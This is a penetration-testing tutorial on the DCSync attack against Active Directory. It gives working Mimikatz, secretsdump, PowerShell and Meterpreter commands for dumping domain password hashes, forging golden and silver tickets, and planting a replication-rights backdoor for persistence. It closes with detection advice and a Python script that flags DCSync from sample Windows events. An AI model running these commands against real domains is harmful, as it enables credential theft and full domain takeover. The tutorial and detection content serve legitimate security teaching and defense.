What is DCSync

In a domain environment, directory data is continuously replicated between domain controllers (DCs). When one domain controller (DC1) needs to pull changes from another (DC2), DC1 sends DC2 an IDL_DRSGetNCChanges request over the Directory Replication Service (DRS) RPC interface (MS-DRSR). The request names the naming context and the point (update sequence number) from which DC1 wants changes; DC2 answers with the changed objects and attributes, and if there is more data than fits in one reply the exchange is repeated. DCSync abuses exactly this mechanism: the attacker's tool impersonates a domain controller and sends its own GetNCChanges requests to a real DC through the DRS interface.

DCSync is a common technique in domain penetration and is built into Mimikatz. Before DCSync existed, obtaining a domain user's hash meant logging on to a domain controller and running code there (dumping LSASS or NTDS.dit) to extract it.

In August 2015, Benjamin Delpy (the author of Mimikatz) and Vincent Le Toux released a version of Mimikatz that added DCSync. The feature mimics a domain controller and asks a real domain controller for data such as a user's password hash. Its key property is that the data is obtained remotely, through the normal replication protocol, without ever executing code on the domain controller.

Note: DCSync against a read-only domain controller (RODC) fails, because an RODC only receives replication and never serves replication data to other DCs.

By default, only members of the Administrators, Domain Admins, Enterprise Admins and Domain Controllers groups hold the replication rights that DCSync needs. However, those rights are ordinary access control entries (ACEs) on the domain object, so a normal domain user can be granted them and then invoke DCSync as well.


Export the intradomain hash using DCSync

After obtaining the appropriate permissions, we can use DCSync to export the hashes of the users in the domain. The principle is to pull the users' credential attributes from the domain controller via IDL_DRSGetNCChanges in the Directory Replication Service (DRS) protocol. Once a domain user's hash is obtained, it can be used further (pass-the-hash, offline cracking, ticket forging).

Through Mimikatz

Run the following command on the domain member host:

lsadump::dcsync /domain:whoamianony.org /user:administrator
lsadump::dcsync /domain:whoamianony.org /all
lsadump::dcsync /domain:whoamianony.org /all /csv

(/user exports one account, /all every account in the domain, /csv prints a compact one-line-per-account listing.)

The output shows that the NTLM hash of the Administrator user is obtained successfully.

Through secretsdump.py

secretsdump.py is a script in the Impacket framework that can also export users' hashes from a domain controller with DCSync. Given valid credentials, it connects to the target over SMB; against a domain controller it dumps the local SAM and LSA secrets through the remote registry and, by default, the domain users' hashes through the DRSUAPI (DCSync) method (the older alternative is to copy NTDS.dit through a volume shadow copy and parse it offline). Its biggest advantage is that it runs from a machine that is not joined to the domain, as long as that machine can reach the DC.

The usage method is as follows:

python3 secretsdump.py whoamianony/administrator:<password>@192.168.93.30 -dc-ip 192.168.93.30 -just-dc-user administrator

General form: python3 secretsdump.py <domain>/<user with DCSync rights>:<password>@<dc-ip> -dc-ip <dc-ip> -just-dc-user <user to dump>

python3 secretsdump.py whoamianony/administrator:<password>@192.168.93.30   # all domain account hashes, machine accounts included (add -just-dc to skip the local SAM/LSA dump)

Through PowerShell (Invoke-DCSync)

The Invoke-DCSync.ps1 script invokes Mimikatz's DCSync function by loading the Mimikatz DLL into memory with Invoke-ReflectivePEInjection.

Run the following command on the domain member host:

Import-Module .\Invoke-DCSync.ps1
# export the hashes of the named domain users
Invoke-DCSync -DumpForest -Users @("administrator") | ft -wrap -autosize
# export the hashes of all domain users
Invoke-DCSync -DumpForest | ft -wrap -autosize

Use DCSync to forge a golden ticket

In domain penetration, we can export the hash of the KRBTGT account from the domain controller through DCSync and use that hash to forge a golden ticket.

The test environment is as follows: assume the attacker has compromised the intranet host Windows 10 and has a Meterpreter session on it. The following shows how to use DCSync to forge a golden ticket and access resources on the DC in the intranet.

After compromising the Windows 10 host, load the Kiwi extension in the Meterpreter session:

load kiwi

Then run the Mimikatz DCSync command through kiwi_cmd to export the hash of the KRBTGT account from the domain controller:

kiwi_cmd "lsadump::dcsync /domain:whoamianony.org /user:krbtgt"

We can then forge the golden ticket with the KRBTGT hash (-s is the domain SID, -k the KRBTGT NTLM hash):

golden_ticket_create -u Administrator -d whoamianony.org -s S-1-5-21-1315137663-3706837544-1429009142 -k 6be58bfcc0a164af2408d1d3bd313c2a -t gold.tck

The generated ticket is stored on the attacker's Kali machine. Next, purge the existing tickets on the target host:

kerberos_ticket_purge

Then use kerberos_ticket_use to inject the generated ticket:

kerberos_ticket_use gold.tck

With the ticket injected, the attacker can access resources on the domain controller from the compromised host:

dir \\DC\c$

What you can do once you hold a golden ticket needs no further explanation.

Use DCSync for intra-domain persistence

As mentioned earlier, DCSync normally requires membership in the Administrators, Domain Admins, Enterprise Admins or Domain Controllers group. But can a normal domain user be given DCSync rights? Of course.

Once we hold domain administrator privileges, we can grant a domain user the replication rights that DCSync needs, so that this user can also export domain users' credentials; this makes a discreet backdoor for maintaining access. To do so, add three ACEs for the user on the domain object (the naming context head, e.g. DC=whoamianony,DC=org), one for each of these extended rights:

DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)

DS-Replication-Get-Changes-In-Filtered-Set (GUID: 89e95b76-444d-4c62-991a-0facbeda640c)

The first two are the ones DCSync actually needs to pull secrets; the third only covers attributes in the RODC filtered set.

We can do this with PowerView.ps1 (part of PowerSploit, also bundled with the Empire framework):

Import-Module .\PowerView.ps1
# add the DCSync ACEs for domain user whoami
Add-DomainObjectAcl -TargetIdentity "DC=whoamianony,DC=org" -PrincipalIdentity whoami -Rights DCSync -Verbose
# remove the three ACEs again
Remove-DomainObjectAcl -TargetIdentity "DC=whoamianony,DC=org" -PrincipalIdentity whoami -Rights DCSync -Verbose

Now the domain user whoami has DCSync rights, and the whoami account can be used to perform DCSync attacks.

For example, we can export the Administrator hash from the DC as whoami using the DCSync method of secretsdump:

python3 secretsdump.py whoamianony/whoami:<password>@192.168.93.30 -dc-ip 192.168.93.30 -just-dc-user administrator

Alternatively, on a domain member host, use runas to open a shell as the whoami user and then run DCSync from it.

First run the following command to open a cmd window under the whoami user's logon:

runas /noprofile /user:whoamianony\whoami cmd

Then run Mimikatz in the new cmd window to do DCSync:

mimikatz.exe privilege::debug "lsadump::dcsync /domain:whoamianony.org /all /csv" exit

(privilege::debug is not needed for DCSync, which is a network request rather than a read of local LSASS memory; for a non-admin user it simply reports an error and Mimikatz continues with the dcsync command.)

Similarly, PowerShell can start a process under the whoami user before running DCSync.

First run the following to open a cmd window under the whoami user's logon:

$uname = "whoamianony\whoami"
$pwd = ConvertTo-SecureString "Whoami2021" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($uname, $pwd)
Start-Process -FilePath "cmd.exe" -Credential $cred

Then run Mimikatz in that cmd window to do DCSync:

mimikatz.exe privilege::debug "lsadump::dcsync /domain:whoamianony.org /all /csv" exit

Query the users with DCSync permission in the domain

We can use AdFind to search the domain for objects whose security descriptor grants the replication rights, which reveals every principal able to DCSync:

AdFind.exe -s subtree -b "DC=whoamianony,DC=org" -sdna nTSecurityDescriptor -sddl+++ -sddlfilter ;;;"Replicating Directory Changes";; -recmute
AdFind.exe -s subtree -b "DC=whoamianony,DC=org" -sdna nTSecurityDescriptor -sddl+++ -sddlfilter ;;;"DS-Replication-Get-Changes";; -recmute

DCSync with a machine account

A machine (computer) account is created for every computer that joins the domain. Its name is the computer name followed by $, for example WIN7$ or WINXP$.

On the computer itself, the machine account's password is stored in the LSA secrets in the registry:

HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets\$MACHINE.ACC
# this key can only be read as SYSTEM

When a computer joins the domain, the same password is also stored on the domain controller in the Active Directory database file NTDS.dit. The password is a random 120-character string rotated automatically every 30 days by default, so even with the account's hash it is not feasible to recover the plaintext; the hash itself, however, can be used as-is (pass-the-hash or ticket forging).

To perform DCSync with a machine account, first obtain that account's credential and then run DCSync as it. The account must itself hold replication rights: a domain controller's own account (e.g. DC$, a member of Domain Controllers) does, an ordinary workstation's account does not. The following is a concrete demonstration using DC$.

First obtain the machine account's password hash

On the domain controller itself, Mimikatz can read the current computer account's hash from the LSA secrets ($MACHINE.ACC) in the registry:

privilege::debug
token::elevate
lsadump::secrets

From a domain member host with sufficient rights, DCSync can also export the hashes of all computer accounts (machine accounts are included in /all):

mimikatz.exe "lsadump::dcsync /domain:whoamianony.org /all /csv"

python3 secretsdump.py whoamianony/administrator:<password>@192.168.93.30

Then perform DCSync with the machine account

With the DC$ machine account's hash in hand, we need a way to authenticate as that account. Since the hash cannot be cracked, we use it directly: one option is a silver ticket for the LDAP service on the DC, forged with the DC$ key.

The usage is as follows (/rc4 is the DC$ NTLM hash, /target and /service name the LDAP service on the DC; the ticket is injected with /ptt and the DC then accepts the DCSync request):

mimikatz "kerberos::golden /domain:whoamianony.org /sid:S-1-5-21-1315137663-3706837544-1429009142 /target:DC.whoamianony.org /service:LDAP /rc4:8e89dfbe74fcae2e993ea2aa47b6a9c1 /user:krbtgt /ptt" "lsadump::dcsync /domain:whoamianony.org /all /csv" exit

It is also possible to run secretsdump from a computer outside the domain, passing the DC$ hash (pass-the-hash) to DCSync the domain controller:

python3 secretsdump.py -hashes :8e89dfbe74fcae2e993ea2aa47b6a9c1 'whoamianony/DC$@192.168.93.30'

Note: this does not work with an ordinary workstation's computer account (e.g. WIN7$). Such an account holds no replication rights and is not an administrator of its own host either, so both DCSync and a secretsdump connection to that computer with its hash fail.

DCSync defense

DCSync imitates replication between domain controllers, so the defense is to treat replication as something only domain controllers do: keep an inventory of DC accounts and addresses and alert whenever replication is requested by any other principal or from any other address. On the network, DRSUAPI traffic (IDL_DRSGetNCChanges, opnum 3 of the MS-DRSR interface) should only ever be seen between DCs. On the DCs themselves, enable auditing of Directory Service Access and watch Security event 4662 whose Properties field contains the replication GUIDs (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) for any account that is not a domain controller.
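The following is an added example (not code from the original page) of that detection logic run over sample events. Event 4662 records who requested the replication rights but not from where, so the script joins each 4662 to the 4624 logon event with the same logon ID to recover the source address; that is what separates genuine DC-to-DC replication from the machine-account case above, where the DC$ hash is replayed from a host that is not a DC. The events are constructed dicts using the EventData field names of the Windows Security log, and the sets of DC accounts and DC addresses are assumptions for the example environment.

```python
"""Detect DCSync attempts from Windows Security events (4662 correlated with 4624).

Added example (not from the original page). Events are constructed here as
dicts carrying the EventData field names of the Windows Security log; in
practice they would come from a SIEM, Windows Event Forwarding or Get-WinEvent.
Requires "Audit Directory Service Access" (success) to be enabled on the DCs.
"""

# Replication extended-right GUIDs as they appear in the 4662 Properties field.
REPLICATION_GUIDS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes",
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes-All",
    "{89e95b76-444d-4c62-991a-0facbeda640c}": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # AccessMask bit for extended (control access) rights

# Assumed environment: the domain's DC computer accounts and their addresses.
DC_ACCOUNTS = {"DC$", "DC2$"}
DC_IPS = {"192.168.93.30", "192.168.93.31"}


def replication_rights_in(ev):
    """Names of replication rights referenced by a 4662 event, or [] if none."""
    if ev.get("EventID") != 4662:
        return []
    if not int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS:
        return []
    props = ev.get("Properties", "").lower()
    return sorted(name for guid, name in REPLICATION_GUIDS.items() if guid in props)


def logon_sources(events):
    """Map logon ID -> source address from 4624 events, so a 4662 can be tied to an IP."""
    return {ev["TargetLogonId"]: ev.get("IpAddress", "-")
            for ev in events if ev.get("EventID") == 4624}


def detect_dcsync(events):
    """Return one alert per replication request that did not come from a DC account at a DC address."""
    sources = logon_sources(events)
    alerts = []
    for ev in events:
        rights = replication_rights_in(ev)
        if not rights:
            continue
        user = ev["SubjectUserName"]
        src_ip = sources.get(ev["SubjectLogonId"], "unknown")
        if user in DC_ACCOUNTS and src_ip in DC_IPS:
            continue   # ordinary DC-to-DC replication
        if user in DC_ACCOUNTS:
            reason = "DC computer account used from a non-DC address (stolen machine-account hash?)"
        else:
            reason = "replication requested by a principal that is not a domain controller"
        alerts.append({"user": user, "src_ip": src_ip, "rights": rights, "reason": reason})
    return alerts


def _e4624(logon_id, user, ip):
    return {"EventID": 4624, "TargetLogonId": logon_id, "TargetUserName": user, "IpAddress": ip}


def _e4662(logon_id, user, mask, guids):
    # Properties in the real event is a multi-line field: access type code, then GUIDs.
    return {"EventID": 4662, "SubjectLogonId": logon_id, "SubjectUserName": user,
            "SubjectDomainName": "WHOAMIANONY", "ObjectName": "DC=whoamianony,DC=org",
            "AccessMask": mask, "Properties": "%%7688\n\t" + "\n\t".join(guids)}


REPL_PAIR = ["{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}", "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"]

# Constructed sample log, in arrival order: a real DC replicating, the backdoored
# user "whoami" running DCSync, DC$'s hash replayed from an attacker box, and a
# plain attribute read by whoami that must not alert.
SAMPLE_EVENTS = [
    _e4624("0x1a2b3c", "DC2$", "192.168.93.31"),
    _e4662("0x1a2b3c", "DC2$", "0x100", REPL_PAIR),
    _e4624("0x4d5e6f", "whoami", "192.168.93.20"),
    _e4662("0x4d5e6f", "whoami", "0x100", REPL_PAIR),
    _e4624("0x7a8b9c", "DC$", "192.168.93.50"),
    _e4662("0x7a8b9c", "DC$", "0x100", REPL_PAIR),
    _e4662("0x4d5e6f", "whoami", "0x10", ["{bf967a68-0de6-11d0-a285-00aa003049e2}"]),
]

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS):
        print(alert)
```

The allowlist is deliberately a pair (account and address) rather than either alone: a DC name by itself would let the replayed DC$ hash through, and an address by itself would miss an attacker who has a shell on a DC. Note also that the filtered-set GUID alone is not enough to pull secrets, which is why the alert lists which rights were requested.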

In addition, enumerate the ACLs in Active Directory to find all privileged accounts, including users that have been granted DCSync rights. The ACLight project on GitHub provides this; running Execute-ACLight2.bat generates the following three files:

Privileged Accounts – Layers Analysis.txt

Privileged Accounts Permissions – Final Report.csv

Privileged Accounts Permissions – Irregular Accounts.csv

All privileged accounts found, including any with replication rights, are listed in these files.